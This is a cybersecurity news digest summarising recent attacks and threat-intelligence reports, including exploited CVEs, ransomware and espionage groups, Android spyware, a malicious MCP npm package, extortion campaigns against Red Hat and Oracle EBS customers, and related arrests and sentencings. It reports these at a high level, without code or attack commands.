A months-long cyberattack on FEMA compromised sensitive data belonging to both FEMA and US Customs and Border Protection (CBP) employees. The hacker installed VPN software to exfiltrate data. The attack exploited the CitrixBleed 2.0 (CVE-2025-5777) vulnerability, which bypasses multi-factor authentication and leaks credentials via system memory.
A previously undetected smishing campaign has been abusing industrial cellular routers manufactured by Milesight to deliver phishing messages across Europe. The campaign, active since at least February 2022, leverages a vulnerability tracked as CVE-2023-43261. It allows threat actors to extract system logs from vulnerable Milesight routers, crack encrypted administrator credentials, and gain unauthorized access to the device’s SMS-sending capabilities.
The Akira ransomware group is evolving its tactics, targeting SonicWall SSL VPN devices and breaching networks even with OTP-based multi-factor authentication enabled. Arctic Wolf researchers observed successful logins despite OTP prompts, suggesting attackers may be using stolen OTP seeds or another method to generate valid tokens. The attacks follow earlier reports of Akira exploiting SonicWall devices, now linked to CVE-2024-40766, an access control flaw disclosed in September 2024.
A report from PicusSecurity details activities of RomCom (aka Storm-0978, Tropical Scorpius, and Void Rabisu), a hybrid threat actor known for its attacks on Ukraine, as well as financial, manufacturing, defense, and logistics sectors in Europe and Canada. In 2025, RomCom exploited the WinRAR path traversal flaw (CVE-2025-8088) to deploy the SnipBot, RustyClaw, and Mythic Agent backdoors. The group has previously exploited other zero-day vulnerabilities, such as CVE-2023-36884 in Microsoft Word and CVE-2024-9680 in Firefox, to gain unauthorized access to systems.
Ukraine’s national cyber incident response team (CERT-UA) has released a report on Russian cyber operations in early 2025. Attacks on local governments rose slightly (32% to 34%); incidents related to the defense sector have also increased from 19% to 23%. But overall, malware, phishing, and account compromises saw a general decrease. Active threats included groups UAC-0218, UAC-0219, UAC-0226, and UAC-0227, along with major actors like UAC-0001 (APT28) and UAC-0002 (Sandworm/APT44) and its subcluster UAC-0125.
A new phishing campaign targets Ukrainian government agencies by impersonating the National Police of Ukraine. Malicious SVG files in emails trigger the download of a password-protected ZIP containing a CHM file, which installs CountLoader. CountLoader then delivers Amatera Stealer and PureMiner malware.
A cyber espionage campaign has been observed by CERT-UA that uses malicious Microsoft Excel add-ins (XLL files) to deliver a new backdoor tracked as ‘CABINETRAT.’ CERT-UA attributed the activity to a threat cluster it monitors as UAC-0245. According to the agency, the threat actors distributed the XLL payloads inside ZIP archives shared via the Signal messaging app and disguised as a document about people detained after attempting to cross the Ukrainian border.
Okta Threat Intelligence found that North Korean workers are using fake identities to apply for remote jobs in many industries. Their goal is to earn money and send it back to the North Korean government. North Koreans are no longer just applying for IT jobs but are also going after finance and engineering roles. The research tracked over 130 fake identities linked to more than 6,500 job interviews at about 5,000 companies between 2021 and mid-2025.
Fortinet's FortiGuard Labs released a write-up on the Confucius group, a cyber-espionage actor active mainly in South Asia. First spotted in 2013, it has consistently targeted government, military, and critical industries, particularly in Pakistan, using spear-phishing and malicious documents for initial access. More recently, the threat actor has changed its tactics, which now include the use of weaponized Office documents, malicious LNK files, and advanced custom malware like Python-based RATs. The group has been observed shifting from document stealers like WooperStealer to Python-based backdoors such as AnonDoor.
SideWinder APT, another highly active state-backed hacker group known for targeting South Asia, has launched a targeted operation, tracked as ‘Operation SouthNet’ by Hunt.io, that uses free hosting platforms (Netlify, pages.dev, workers.dev, b4a.run) to deploy credential-harvesting portals and weaponized lure documents. The campaign is aimed at government and military entities in Pakistan and Sri Lanka, with supporting activity touching Nepal, Bangladesh, and Myanmar.
A malware campaign run by the threat actor tracked as ‘Detour Dog’ has infected tens of thousands of websites, using DNS to secretly redirect visitors and execute remote content. Active since August 2023, the malware targets users based on location and device type. Infoblox says that Detour Dog was involved in spreading the Strela Stealer malware in mid-2023, hosting the backdoor StarFish and distributing the stealer via compromised sites and DNS TXT records. The campaign used botnets like REM Proxy and Tofsee to deliver malicious emails.
NVISO Labs has analyzed recently observed activities by Lunar Spider (aka Gold SwathMore), a Russian-speaking financially motivated group behind IcedID/BokBot. The group shifted to a new MaaS called Latrodectus after IcedID’s disruption in May 2024. The threat actor compromises vulnerable websites via CORS misconfigurations and injects a JavaScript FakeCaptcha that overlays the site in an iframe and reports victim clicks to a Telegram channel.
Separately, NVISO has warned the China-linked threat actors have been exploiting a recently patched local privilege escalation flaw in Broadcom’s VMware Tools and VMware Aria Operations since mid-October 2024. Tracked as CVE-2025-41244, the vulnerability affects multiple VMware products, including VMware Cloud Foundation (4.x, 5.x, 9.x.x.x and 13.x.x.x), VMware vSphere Foundation (9.x.x.x and 13.x.x.x), VMware Aria Operations 8.x, VMware Tools (11.x.x, 12.x.x, 13.x.x), VMware Telco Cloud Platform (4.x, 5.x) and Telco Cloud Infrastructure (2.x, 3.x).
Speaking of China-aligned threat actors, a previously unknown China-linked hacker group, dubbed ‘Phantom Taurus’, has spent over two years conducting stealthy cyber espionage across government and telecom sectors in Africa, the Middle East, and Asia, according to PAN’s Unit 42. The group uses a custom .NET malware suite called NET-STAR to target IIS servers, along with backdoors that maintain encrypted C2 channels and enable in-memory payload execution.
A new Cisco Talos’ report examines UAT-8099, a Chinese-speaking cybercrime group that uses search engine optimization (SEO) fraud to steal sensitive data such as credentials, configuration files, and certificates. The group primarily targets high-value Internet Information Services (IIS) servers in countries like India, Thailand, Vietnam, Canada, and Brazil, with victims including universities, tech companies, and telecom providers. UAT-8099 manipulates search rankings by compromising reputable servers and uses tools like web shells, Cobalt Strike, BadIIS malware, and custom automation scripts to maintain persistence, evade detection, and hide their activities.
A major data leak has exposed sensitive information about the Iranian cyber-espionage group Charming Kitten, also known as APT35. A group calling itself KittenBusters published multiple archives on GitHub, revealing the group's malware tools, past cyberattacks, and identities of alleged members. The leak names dozens of individuals working for front companies linked to APT35 and identifies the group's leader as Abbas Hossein. APT35 has previously been linked to Unit 1500 of Iran's Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO).
Two Android spyware campaigns, dubbed ‘ProSpy’ and ‘ToSpy,’ are impersonating popular messaging apps like Signal and ToTok to infiltrate users’ devices in the United Arab Emirates (UAE). The attacks use social engineering and fake websites mimicking legitimate app pages to trick users into manually downloading spyware-laden APK files. Once installed, the malicious apps gain persistent access and silently exfiltrate sensitive data such as contacts, SMS messages, device information, media files, and chat backups.
A new Android banking trojan called ‘Klopatra’, disguised as an IPTV and VPN app, has infected over 3,000 devices across Europe. It enables real-time screen monitoring, input capture, and remote control via hidden VNC. Developed by a likely Turkish-speaking cybercrime group, Klopatra steals banking credentials, keystrokes, and cryptocurrency wallet data. It is possible, that Klopatra operates as a private botnet with limited affiliates and does not offer public MaaS.
Trend Micro has uncovered an active campaign spreading malware via WhatsApp through a ZIP file attachment that, once executed, hijacks the victim’s account to send itself to all contacts. The phishing message contains the malicious file attachment that requires users to open it on a desktop, suggesting that threat actors might be more interested in targeting enterprises rather than consumers. Once opened, the malware automatically propagates via WhatsApp Web, causing infected accounts to be banned due to excessive spam activity. The campaign appears to have been focused on Brazil, with organizations in government, public service, manufacturing, technology, education, and construction sectors being targeted.
Cybersecurity researchers have spotted what is believed to be the first malicious use of a Model Context Protocol (MCP) server in the wild. The rogue code was found hidden within an npm package named ‘postmark-mcp,’ which mimicked a legitimate Postmark Labs library used for managing emails with AI assistants.
Varonis researchers have detailed a new phishing and malware toolkit dubbed ‘MatrixPDF,’ which turns regular PDFs into interactive lures, bypassing email security to steal credentials or deliver malware. Though marketed as a phishing simulation tool, it was first spotted on cybercrime forums, with sellers also using Telegram.
A hacking group calling itself the Crimson Collective claims to have breached Red Hat’s private GitHub repositories, stealing nearly 570GB of compressed data spread across over 28,000 internal projects. The group claims it accessed approximately 800 Customer Engagement Reports (CERs), internal consulting documents that often contain sensitive client information. The hackers tried to extort Red Hat, but reportedly got no answer.
Oracle has linked an ongoing extortion campaign by the Clop ransomware gang to vulnerabilities in its E-Business Suite (EBS) that were patched in July 2025. While Oracle hasn't definitively attributed the attacks to Clop, Chief Security Officer Rob Duhart confirmed customers have received extortion emails from the group. The company didn’t specify which vulnerability was exploited.
Mandiant and the Google Threat Intelligence Group (GTIG) reported that executives at several companies have received ransom emails threatening to leak sensitive data allegedly stolen from their Oracle E-Business Suite systems. According to GTIG’s principal threat analyst Austin Larsen, the extortion attempts began on or before September 29, 2025.
Two 17-year-old Dutch boys have been arrested on suspicion of spying for Russia using hacking devices near sensitive locations in The Hague, including the offices of Europol, Eurojust, and the Canadian embassy. The teens allegedly used a WiFi sniffer, an electronic device designed to detect and intercept wireless networks, to gather intelligence while walking near secure international buildings. One boy was arrested while finishing his homework at home, with his parents reportedly unaware of his activities.
A Chinese national has been convicted for involvement in a fraudulent cryptocurrency scheme following the largest cryptocurrency seizure in global history, valued at more than £5.5 billion ($7.3 billion). Zhimin Qian, 47, also known as Yadi Zhang, pleaded guilty to acquiring and possessing criminal property under the Proceeds of Crime Act. Qian was behind a vast fraudulent Bitcoin investment scheme that defrauded over 128,000 victims in China between 2014 and 2017.
China has sentenced 11 members of the notorious Ming crime family to death for operating cyber scam compounds in Myanmar. Five others received suspended death sentences, 11 were given life sentences, and 12 more received prison terms ranging from five to 24 years. The group was arrested in November 2023 as part of China’s crackdown on scams targeting its citizens. Operating from Myanmar's Kokang region, the Ming family trafficked people into prison-like compounds to run illegal gambling and online fraud schemes, generating at least $1.4 billion between 2015 and 2023.